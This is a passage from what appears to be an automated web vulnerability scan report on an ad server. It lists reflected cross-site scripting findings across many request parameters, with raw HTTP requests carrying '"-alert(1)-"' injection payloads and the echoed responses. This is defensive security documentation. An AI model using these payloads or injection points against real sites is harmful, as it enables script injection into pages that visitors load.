User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=10068308"-alert(1)-"d64be5ea104&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt
...[SNIP]...

1.46. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1876d"-alert(1)-"160f9d82a0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=1876d"-alert(1)-"160f9d82a0c&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=1876d"-alert(1)-"160f9d82a0c&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.
...[SNIP]...

1.47. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3ce1"-alert(1)-"791190644da was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301b3ce1"-alert(1)-"791190644da&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301b3ce1"-alert(1)-"791190644da&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&
...[SNIP]...

1.48. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d649"-alert(1)-"cfdd3f5d6a4 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.181d649"-alert(1)-"cfdd3f5d6a4&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.181d649"-alert(1)-"cfdd3f5d6a4&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fs
...[SNIP]...

1.49. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 589a1"-alert(1)-"fe600fcd18e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4589a1"-alert(1)-"fe600fcd18e&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4589a1"-alert(1)-"fe600fcd18e&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&
...[SNIP]...

1.50. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c01f"-alert(1)-"1e1ca44f3c0 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=4766227c01f"-alert(1)-"1e1ca44f3c0&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
= escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=4766227c01f"-alert(1)-"1e1ca44f3c0&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmo
...[SNIP]...

1.51. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda0f"-alert(1)-"fa66ca5b726 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3eda0f"-alert(1)-"fa66ca5b726&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3eda0f"-alert(1)-"fa66ca5b726&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd
...[SNIP]...

1.52. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17b0"-alert(1)-"23356903145 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023e17b0"-alert(1)-"23356903145&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023e17b0"-alert(1)-"23356903145&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired
...[SNIP]...

1.53. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ad4"-alert(1)-"77acc02db13 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2090ad4"-alert(1)-"77acc02db13&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2090ad4"-alert(1)-"77acc02db13&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.54. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7524b"-alert(1)-"e973f58c800 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=27524b"-alert(1)-"e973f58c800&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:06 GMT
Expires: Mon, 22 Nov 2010 00:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
/click%3Bh%3Dv8/3a5a/17/14a/%2a/g%3B231155693%3B0-0%3B0%3B54795159%3B4307-300/250%3B36901567/36919445/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=27524b"-alert(1)-"e973f58c800&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11
...[SNIP]...

1.55. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81642"-alert(1)-"7b5e5f069a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=19248781642"-alert(1)-"7b5e5f069a0&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:12 GMT
Expires: Mon, 22 Nov 2010 00:12:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

